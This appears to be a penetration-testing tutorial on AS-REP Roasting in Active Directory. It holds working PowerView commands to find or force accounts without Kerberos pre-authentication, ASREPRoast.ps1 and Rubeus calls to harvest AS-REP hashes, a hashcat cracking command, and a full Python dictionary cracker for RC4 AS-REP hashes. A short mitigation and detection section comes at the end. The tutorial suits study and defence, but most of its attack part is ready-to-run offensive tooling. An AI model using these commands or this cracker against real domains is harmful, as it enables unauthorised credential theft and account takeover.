AS-REP Roasting is a technique that abuses accounts with Kerberos pre-authentication disabled during the initial authentication exchange with the Key Distribution Center (KDC).
During that exchange the client asks the KDC for a Ticket Granting Ticket (TGT) with an AS-REQ. If the account exists, the KDC answers with an AS-REP. The TGT itself is encrypted with the krbtgt key, but the AS-REP also carries an encrypted part (the session key and ticket metadata) that is encrypted under the account's long-term key, which is derived from the account's password. Only a client that knows that password can decrypt it, and that encrypted part is what gets cracked.
With pre-authentication required (the default), the KDC refuses to issue the AS-REP until the client proves it knows the key by sending an encrypted timestamp in the AS-REQ, so an attacker never receives anything to crack. If the account's UserAccountControl has "Do not require Kerberos preauthentication" set (the DONT_REQ_PREAUTH flag, 0x400000 = 4194304), anyone who can reach the KDC can send an AS-REQ naming that account, receive the AS-REP and brute-force the password offline against its encrypted part. No valid domain credentials are needed for the request, only the target's username.
Enumerating accounts with Kerberos pre-authentication disabled using PowerView
Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
To check a specific user, decode its userAccountControl value:
Get-DomainUser username | ConvertFrom-UACValue
and look for DONT_REQ_PREAUTH in the list of flags.
If no account has pre-authentication disabled but we hold GenericWrite or GenericAll over a user object, we can disable it ourselves by setting the DONT_REQ_PREAUTH bit (4194304, i.e. 0x400000) in that user's userAccountControl:
Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
Note that -XOR toggles the bit rather than setting it, so check the current value first (Get-DomainUser username | ConvertFrom-UACValue); run against an account that already has the flag, the command would clear it. The write is also logged on the domain controller (event 4738, "A user account was changed", records the old and new UAC values), so this path is far noisier than harvesting accounts that were already misconfigured, and the bit should be cleared again once the hash has been collected.
Request the encrypted AS-REP for offline brute force.
We will use ASREPRoast.ps1, but Rubeus (Rubeus.exe asreproast) can do the same.
The Get-ASREPHash function wraps New-ASReq to build the AS-REQ for the given user and domain, locates a domain controller for that domain, sends the request and returns the response bytes formatted as a hash:
Get-ASREPHash -Domain domain -UserName username -Verbose
We can also use the Invoke-ASREPRoast function, which first enumerates every user that does not require Kerberos pre-authentication and then requests a hash for each of them:
Invoke-ASREPRoast -Verbose | fl
Cracking AS-REP hashes with hashcat
ASREPRoast.ps1 prints the hash as $krb5asrep$user@domain:…, but hashcat mode 18200 (Kerberos 5 AS-REP, etype 23, i.e. RC4-HMAC) expects the encryption type right after the prefix, so insert 23 like this:
$krb5asrep$23$admin@first.local:….
and crack it with a dictionary attack (-a 0; -a 3 is the mask attack and would treat the wordlist path as a mask):
hashcat -m 18200 -a 0 -O '$krb5asrep$23$admin@first.local:...' /path/to/wordlist
Keep the hash in single quotes so the shell does not expand the $ fields, or put it in a file and pass the file name instead. -O selects the optimized kernels, which cap the candidate password length (hashcat prints the limit at startup); drop it if the wordlist has long entries. The 23 only applies to RC4 responses: if the KDC answered with AES (etype 17 or 18), hashcat has separate modes for those and each candidate is much more expensive to test.
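What hashcat mode 18200 actually does with each candidate, as an added example in Python (not ASREPRoast or hashcat code): the NT hash of the candidate is derived (MD4 over the UTF-16LE password), the RC4-HMAC keys for key usage 8 (the AS-REP enc-part) are derived from it, the encrypted part is decrypted and the HMAC-MD5 checksum is recomputed; only the right password reproduces the checksum the KDC sent, which is why the crack needs no further contact with the DC. The block also performs the $23$ insertion described above. The principal, the password and the enc-part body are constructed for the example (the body is a stand-in blob rather than a real ASN.1 EncASRepPart), and MD4 and RC4 are implemented inline because OpenSSL 3 builds of Python's hashlib may lack MD4.

```python
"""Offline check of an etype-23 (RC4-HMAC) AS-REP hash, i.e. what hashcat mode 18200
does per candidate. Added example; MD4/RC4 are inline since OpenSSL 3 builds of
hashlib may lack MD4. Principal, password and enc-part body are constructed."""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
KEY_USAGE_AS_REP_ENC_PART = 8  # RFC 4120 key usage number for the AS-REP enc-part
HASHCAT_PREFIX = "$krb5asrep$23$"  # mode 18200: $krb5asrep$<etype>$user@realm:cksum$edata

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 of the UTF-16LE encoded password."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: words 0..15
            a = rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: words 0,4,8,12,1,5,9,13,...
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: words 0,8,4,12,2,10,6,14,...
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 RC4-HMAC: output is checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)
    return checksum + rc4(hmac_md5(k1, checksum), data)

def rc4_hmac_verify(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """Decrypt under the candidate key and recompute the HMAC; only the right NT hash matches."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    plaintext = rc4(hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(hmac_md5(k1, plaintext), checksum)

def to_hashcat_18200(line: str) -> str:
    """Insert the '23' etype field that ASREPRoast.ps1 output lacks."""
    if not line.startswith("$krb5asrep$"):
        raise ValueError("not an AS-REP hash line")
    return line if line.startswith(HASHCAT_PREFIX) else HASHCAT_PREFIX + line[len("$krb5asrep$"):]

def parse_hashcat_18200(line: str):
    """'$krb5asrep$23$user@realm:cksumhex$edatahex' -> (user@realm, cksum, edata)."""
    if not line.startswith(HASHCAT_PREFIX):
        raise ValueError("not a hashcat 18200 hash line")
    principal, rest = line[len(HASHCAT_PREFIX):].split(":", 1)
    checksum_hex, edata_hex = rest.split("$", 1)
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)

def crack(line: str, wordlist):
    """Dictionary attack; accepts either hash shape. Returns the password or None."""
    _, checksum, edata = parse_hashcat_18200(to_hashcat_18200(line))
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), KEY_USAGE_AS_REP_ENC_PART, checksum, edata):
            return candidate
    return None

def make_sample_hash(principal: str, password: str) -> str:
    """Constructed hash in ASREPRoast.ps1's shape; the body is a stand-in, not real ASN.1."""
    body = b"constructed EncASRepPart stand-in (session key, times, ...)"
    blob = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE_AS_REP_ENC_PART, body, b"\x01" * 8)
    return f"$krb5asrep${principal}:{blob[:16].hex()}${blob[16:].hex()}"
```

Calling make_sample_hash("admin@first.local", "Summer2019!") gives a line in the ASREPRoast.ps1 shape; to_hashcat_18200 turns it into the 18200 shape and crack walks a wordlist against it. The per-candidate cost is one MD4, three HMAC-MD5s and one RC4 pass over the enc-part, which is why RC4 AS-REP hashes crack at roughly the rate of NTLM hashes on a GPU.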
Mitigation
To defend against AS-REP roasting, find the user accounts that are set to not require Kerberos pre-authentication and clear the flag wherever it is not strictly needed. The bitwise LDAP filter below lists them (4194304 is the DONT_REQ_PREAUTH bit):
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
Where an application genuinely needs the flag, treat the account as exposed: give it a long, random password that will not appear in breached wordlists so that the offline crack is impractical, and keep it out of privileged groups. Monitoring catches the abuse itself: on the domain controllers, event 4768 (a Kerberos authentication ticket was requested) with Pre-Authentication Type 0 means the AS-REQ was answered without pre-authentication, and a run of such events for several accounts from one source address is the roasting pattern. Disabling RC4 in favour of AES for the account does not remove the exposure but makes each candidate password far more expensive to test.